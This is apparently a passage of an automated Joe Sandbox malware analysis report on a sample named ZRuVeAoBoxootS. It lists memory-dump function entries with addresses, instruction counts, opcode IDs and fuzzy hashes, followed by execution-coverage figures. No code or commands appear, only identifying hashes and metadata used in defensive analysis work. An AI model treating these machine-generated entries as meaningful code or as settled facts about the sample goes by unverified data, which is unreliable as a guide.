                        • Instruction ID: 7cffd8205289fd944b42908e0c93062c6b03b703a3a7629d8ce936c12cf4047e
                        • Opcode Fuzzy Hash: 3b228e56afa77d657b8ae63c3fb7ceec95ae394f0f9b0c060667196d3d1beb98
                        • Instruction Fuzzy Hash: 02F0963130051087DB2AA675983473D37969FC5A97F154129E425CB3A3DF64F803C785
                        Function 04F3BD1F Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea8c1522d8192b7d1c461764b3df9fe228908256584e1ae1be85ee14788cc719
                        • Instruction ID: 01be9561dc9ef0e1e791422eaa138212a8e2e86ef7783942663eedd8d4ad9386
                        • Opcode Fuzzy Hash: ea8c1522d8192b7d1c461764b3df9fe228908256584e1ae1be85ee14788cc719
                        • Instruction Fuzzy Hash: 01F024353002118BD7258E279465A7D37A8DFC1A97B08016ED442C7653DF30F803D7A1
                        Function 04F38883 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c42fdb77a7f86e48668beeb9e5fe729675184702333517588f7b5d629b0f060
                        • Instruction ID: 4086200daccf50d4ef9d9573d73f35e39d15cfefc342b6c5ad58ba90245d619d
                        • Opcode Fuzzy Hash: 7c42fdb77a7f86e48668beeb9e5fe729675184702333517588f7b5d629b0f060
                        • Instruction Fuzzy Hash: 05F04F347102109FD754DB69D848A6973EAEFC9752B1940BAE50AD73B4CE70EC42CBA1
                        Function 04F3DB00 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ffe2965c734833caaf7354c035815b8bb966f6d81b398bbf8b6bd70870b9a577
                        • Instruction ID: 12502f76fe876f497391fdabf692e586bc6f8ce4fd81cdd39bf6414eac85a948
                        • Opcode Fuzzy Hash: ffe2965c734833caaf7354c035815b8bb966f6d81b398bbf8b6bd70870b9a577
                        • Instruction Fuzzy Hash: AFF0C2352002009FC7249B2AE484A2AB7EAFFC9721F11025EE54987661DB31AC42CB94
                        Function 04F34380 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8949f782309d77be3411eb075d6f634fe52f2ad21e7e0abd85cdfc525dc4e7bf
                        • Instruction ID: 73aa877a0043f5ab09a0dbeb546bad88916678f9aa5c83f7eb12250e6a39ac43
                        • Opcode Fuzzy Hash: 8949f782309d77be3411eb075d6f634fe52f2ad21e7e0abd85cdfc525dc4e7bf
                        • Instruction Fuzzy Hash: 26F0963474071057E718AA24945576E3296AFC8B17F00811CD9068F7D1CFA5BC1757D9
                        Function 04F32EEA Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88d791d786091402f12c12a46806f324d542d5e104795bd631899673e4439148
                        • Instruction ID: c8a370286329c98e457b3769a1063b2a418229ac558b7f8b7813c3fe3bb28832
                        • Opcode Fuzzy Hash: 88d791d786091402f12c12a46806f324d542d5e104795bd631899673e4439148
                        • Instruction Fuzzy Hash: CDF05CB6B091121FA7149A799C408BF7FFCEBC9654705007AF404C7201E9619C0343A0
                        Function 04F34F58 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20fc6e04faba21e9476b5ab91626dae28172e1e8440a2b8c5e9fc6fda8c99de7
                        • Instruction ID: 95874df817ab84f975f3cdef6222159bbefc32cbae47c6f11c612170cf35014e
                        • Opcode Fuzzy Hash: 20fc6e04faba21e9476b5ab91626dae28172e1e8440a2b8c5e9fc6fda8c99de7
                        • Instruction Fuzzy Hash: DCF0FC35700704CBC7157B39E44887EB7A6FFC9321701861EE90983350DF359841CA95
                        Function 04F3AC5B Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d32cbd09023e98539b3e8c7e9aff71f0a998971d0bab6457a29195e7f2699dc
                        • Instruction ID: 76b6127c81da04a7e228520ae1ace99213f1f0b4ae3c9aaf07aee638017a129b
                        • Opcode Fuzzy Hash: 9d32cbd09023e98539b3e8c7e9aff71f0a998971d0bab6457a29195e7f2699dc
                        • Instruction Fuzzy Hash: 1301A875E00609DFCB40EFA8C5459ADBBF4EF49210F1185AAE859E7321E770EA44CF91
                        Function 04F3DE98 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 930d269ab6664693d458a80f4d4f749fa10dafa934ef3cd333163a30d8a81a83
                        • Instruction ID: 2488c981467d3ba32c11b53930fb8197fabc0e946883486ba68480a8a9214122
                        • Opcode Fuzzy Hash: 930d269ab6664693d458a80f4d4f749fa10dafa934ef3cd333163a30d8a81a83
                        • Instruction Fuzzy Hash: 76F0B4327007155F96249B6AE88485ABBEAEBC4231300853AE109CB260DFA1DC0587D5
                        Function 04F3DA90 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a676584b2ba80038504b41eb33a3db5bdf3d8f0607f5dc468cb51bd7c1ab8a4
                        • Instruction ID: e983a11b586efdd1f13c3872e4e36427660b12a006cd7a959944ddb13ea2def9
                        • Opcode Fuzzy Hash: 1a676584b2ba80038504b41eb33a3db5bdf3d8f0607f5dc468cb51bd7c1ab8a4
                        • Instruction Fuzzy Hash: BDF06D31A04B048BDB15BB78C8104AEB779EFC1262F05466DD94967201EF74B982C7E6
                        Function 04F3BC98 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0775094f7437d07abd715c89479a19d368bdf5ea57c93bd1f2cdba306f3ae002
                        • Instruction ID: 559b3bf2e981343de3428ecc1199d63340c1252d9c514e0ae3df1814720d521a
                        • Opcode Fuzzy Hash: 0775094f7437d07abd715c89479a19d368bdf5ea57c93bd1f2cdba306f3ae002
                        • Instruction Fuzzy Hash: D5F0823130061087DB2AA679983863D7396DFC5A97B154129E426CB3A3DF64F843C795
                        Function 0270D744 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1675054945.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_270d000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e168f125506bc31721946780e839f227a582c79260b30c78cc0fbbc2d45d9b02
                        • Instruction ID: b6e034d2b300f63786734ba9a74217b87c3c311c612389159222e5b580ed82d2
                        • Opcode Fuzzy Hash: e168f125506bc31721946780e839f227a582c79260b30c78cc0fbbc2d45d9b02
                        • Instruction Fuzzy Hash: 62F06271405344DEE7208E16C8C4B66FFD8EB81734F18C45AED484B2C6C379A844CAB1
                        Function 04F3DE88 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bc2b204081be692cb4e8b2ae8088ec57dc062fd7ca919caf11f8d6dbc4abc893
                        • Instruction ID: 8b8f825d2f5bd6941c05ecaf2d2826bbdce86936d637276a74bcad71ca4fdd09
                        • Opcode Fuzzy Hash: bc2b204081be692cb4e8b2ae8088ec57dc062fd7ca919caf11f8d6dbc4abc893
                        • Instruction Fuzzy Hash: EAF059313103016BC6209B76E8C4A4A7FEAEB81230701853AF005CB261DEA0EC058BD5
                        Function 04F3DB10 Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62a4bb6fc97d171f5365a79ae0a8b96f5eaccced7d1f11e6d6bf57636b8df1f8
                        • Instruction ID: cdf7d607b452fbd67378b77c871468ccb42082d657f3adb533fbc1d227dacd93
                        • Opcode Fuzzy Hash: 62a4bb6fc97d171f5365a79ae0a8b96f5eaccced7d1f11e6d6bf57636b8df1f8
                        • Instruction Fuzzy Hash: 9FF054357006149FC7249F1AE48496AB7ABEFC8721B11055DE50A8B761DF31FC42CB95
                        Function 04F3AC68 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                        • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                        • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                        • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                        Function 04F3DEF1 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15393280be9a7f34eb74a2fca06d1163354248f8ea14f56cd65e71f8da1cc089
                        • Instruction ID: 58f69e66a2607f97fb846a95069d565a3c6aed87089e498bba7597f618c08523
                        • Opcode Fuzzy Hash: 15393280be9a7f34eb74a2fca06d1163354248f8ea14f56cd65e71f8da1cc089
                        • Instruction Fuzzy Hash: C5F067302412109FC314CB38E888D997BEABF4A724B028499F04ACF372DB72EC40CB80
                        Function 04F36994 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f50645077db37916b90519615f1742fa2ee64d6c9c070c3ef0eb72c93be6a66
                        • Instruction ID: 8730e258328455c0997df33fecb42a4b878bf66e891b7f45a95c84a3e81c95e6
                        • Opcode Fuzzy Hash: 1f50645077db37916b90519615f1742fa2ee64d6c9c070c3ef0eb72c93be6a66
                        • Instruction Fuzzy Hash: 4CF0A01260E2D02FE33303A85C312913FF88E4716574904DBD584DB6A2E148A8269366
                        Function 04F384B0 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 268a116fd552d8a0d5001fbb5119746e879d9f3be554696a8dbc7716fc3c32b3
                        • Instruction ID: 730176d25912e0d57c07ef78a9980fbbb03df1df0556f98c335755512a079392
                        • Opcode Fuzzy Hash: 268a116fd552d8a0d5001fbb5119746e879d9f3be554696a8dbc7716fc3c32b3
                        • Instruction Fuzzy Hash: E0E09275B00A144B9748FB6EA40486AF7DBAFC8710308C0BED60DC7764ED70AC028A91
                        Function 04F32D2E Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b221f828fb2936a6e485ffef47acf4c88f9000fc779541b3c86e70963a2f949
                        • Instruction ID: a78195dfe2109c58998a454eabc733de7d94d037655c97bc5731733d85d09e52
                        • Opcode Fuzzy Hash: 7b221f828fb2936a6e485ffef47acf4c88f9000fc779541b3c86e70963a2f949
                        • Instruction Fuzzy Hash: 20E04F72B001142BA748EEB99C405EFBBFADB84595B10C07AD409E7240FE30AD0347D0
                        Function 04F3DF00 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8f68ce702e0a6abf208f615eb3a2057a909160dde73a43d8621c790ccef4f84
                        • Instruction ID: cfb8b7b9f6b9885b9c3a16c02076b4c88aead88c6592a9778e7e94b01796ff2e
                        • Opcode Fuzzy Hash: a8f68ce702e0a6abf208f615eb3a2057a909160dde73a43d8621c790ccef4f84
                        • Instruction Fuzzy Hash: 78F0DF30210610CFC718DB28D588C597BE6EF4AB1971245A9E10ACF772CB72EC41CB80
                        Function 04F31B40 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab1fb1c5d4ff491bd3f7f895fda4224972eac1bf763502916de8be076c4fce64
                        • Instruction ID: 39b8a4031b532f310002588e43f13de2513a8d4d811c8afc867ea09dc31dc627
                        • Opcode Fuzzy Hash: ab1fb1c5d4ff491bd3f7f895fda4224972eac1bf763502916de8be076c4fce64
                        • Instruction Fuzzy Hash: 3CF0E5B0E0A349AFDB01FF70E841498BBB6EB46210B10809DD405DB255E6310F038B51
                        Function 04F3BC50 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d55a5fe4353ae1a71367cf29abfa90119c23e7492b99caedcec82a598ffb150
                        • Instruction ID: 378c833f039de9d24ba08bef59d2d12cad4270bf2e4a25866857ff6cd8810927
                        • Opcode Fuzzy Hash: 6d55a5fe4353ae1a71367cf29abfa90119c23e7492b99caedcec82a598ffb150
                        • Instruction Fuzzy Hash: 0BE086303147445FC318CB6EE440A997BE9DB89761B1486AEF046C7762DE61FD064B84
                        Function 04F38ABC Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cb0138509d5cbad82e9434b9656f7215babbc939559dde9fb70bd0168f1c81a
                        • Instruction ID: d51330be6fad6de8cf9603b99e36161f58a8f51a298f4887e9759af982ae2b30
                        • Opcode Fuzzy Hash: 1cb0138509d5cbad82e9434b9656f7215babbc939559dde9fb70bd0168f1c81a
                        • Instruction Fuzzy Hash: 4AE0C230310708AFC328DB1CE890D9A73EAEF8877131489A9F01AD3321DE61FC054A88
                        Function 04F384A0 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d1c1d2586d8340da781c7f5c8e44f4f9bb09eef60ca4dc9ecaa768fed90c9ed
                        • Instruction ID: 7fd7cab329ee82374ddf053febb0dd163b7f6ab3cb5a922fd0d2d3e77da268a1
                        • Opcode Fuzzy Hash: 3d1c1d2586d8340da781c7f5c8e44f4f9bb09eef60ca4dc9ecaa768fed90c9ed
                        • Instruction Fuzzy Hash: EAE07D752007041BD315E7FFA8005677FAFFFC8700704C16ED90983A05E93069028BD0
                        Function 04F390D1 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a352af083fe2ebffbed151e1c0bb4926416e05cc373b1be5696a5b983141ccfc
                        • Instruction ID: 8fda3693f23ef4b3fc791b957f345ba7d8be67b44da45d403f510325885df52c
                        • Opcode Fuzzy Hash: a352af083fe2ebffbed151e1c0bb4926416e05cc373b1be5696a5b983141ccfc
                        • Instruction Fuzzy Hash: C1E0C2322001585FC3014778E818A967FF8EF4E215B0840A6FD05C7331CA20EC10D781
                        Function 04F36968 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 265f1239d08b122365642e41e38e56a0e05824c4385ccfe262758c28b18f4d11
                        • Instruction ID: 6fac646c460f8f6c7fbdc21c996b67900fe593bb7424b45ede30f66158d7123e
                        • Opcode Fuzzy Hash: 265f1239d08b122365642e41e38e56a0e05824c4385ccfe262758c28b18f4d11
                        • Instruction Fuzzy Hash: B7D0A7327412345F6B3837B4741406D339CCF8466B300087EEA0EC6600EE31982142E8
                        Function 04F3654B Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c888d6c2f12c9b241e256bcf691731833b3f1b82caf8170fe21a03a0e8591d
                        • Instruction ID: edf683efc4eb8cb24bb38012a27f91744213016619a630e43588aeeed70b4191
                        • Opcode Fuzzy Hash: 07c888d6c2f12c9b241e256bcf691731833b3f1b82caf8170fe21a03a0e8591d
                        • Instruction Fuzzy Hash: C9E09A3660110DABDF01DF80E951BDEBB72FB98316F108015EA156A254C7725A26DB91
                        Function 04F31B50 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fea4a9d02e8039fd070462c0396bfbd12d3af7b039df937a36ba4e48130d769f
                        • Instruction ID: 499d62dc1c25a298079c3c309fc22d5eaf544b86d34df6c9abff37379d258714
                        • Opcode Fuzzy Hash: fea4a9d02e8039fd070462c0396bfbd12d3af7b039df937a36ba4e48130d769f
                        • Instruction Fuzzy Hash: 5DE0BF70A06209EFDB00FFA4E94085DB7B6EB45214B508599D80997354EB726F109B55
                        Function 04F36958 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f197a04be02809bd37a189f08148b4b8690372a3aaa84deb4148f22cda91b8d0
                        • Instruction ID: 4ff60341b174506c80e079779e4c5629bbb6fb8acb039be54de834ef56d23278
                        • Opcode Fuzzy Hash: f197a04be02809bd37a189f08148b4b8690372a3aaa84deb4148f22cda91b8d0
                        • Instruction Fuzzy Hash: 1FD022333081A017F73103ECA8323863BDCCF8A578F4808B6EE08D3B40E448E8304199
                        Function 04F390E0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0608bd50f02646e89bf8818ed17ea090259c0feafd94b7c31aaf5d691146b9e1
                        • Instruction ID: c0a11ce576d7e259dedb2da7ab7439c092b2fde6342c5324428c85f74e979db1
                        • Opcode Fuzzy Hash: 0608bd50f02646e89bf8818ed17ea090259c0feafd94b7c31aaf5d691146b9e1
                        • Instruction Fuzzy Hash: 70D0C9363102289F87059B68E848CAA7BE9EB4D7613118066F909C7321CE71DC10CBD4
                        Function 04F36380 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                        • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                        • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                        • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                        Function 04F36C10 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9714bf9fc50829cfca30284e44502e5673edbc871c58fe48db3e242c0f655df
                        • Instruction ID: 490b9c5fac827ea4376c9e46ed41e3c7101fbb7865c4b630538ffa562e3e1319
                        • Opcode Fuzzy Hash: b9714bf9fc50829cfca30284e44502e5673edbc871c58fe48db3e242c0f655df
                        • Instruction Fuzzy Hash: 74B012CF80600037EF04E1319CC33426113DFFD206FE8F410448074500D51C82C32181
                        Function 04F36542 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                        • Instruction ID: 7c28c018d1549d70a96f05d8c5106c7b12b139b68069b277dd7e07b2750d14b6
                        • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                        • Instruction Fuzzy Hash: 51B09237A0400899EB108A84B4413EEF720E790226F204023C2119204193721165A6D1
                        Function 04F35894 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a13036eb593b5ab7e398b7c17b7f47856420382d22ad3939a5fb77bad01b5bbf
                        • Instruction ID: 669b6de6fe35038feb8f8e33b436d85a45c125fd07efbe2d0685cd4b5b8c8421
                        • Opcode Fuzzy Hash: a13036eb593b5ab7e398b7c17b7f47856420382d22ad3939a5fb77bad01b5bbf
                        • Instruction Fuzzy Hash: 36B0122534510073FA04A1350EC422A0113DBC85163C0ED01284154000C91C6002500D

                        Execution Graph

                        Execution Coverage:1.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:3.6%
                        Total number of Nodes:632
                        Total number of Limit Nodes:17
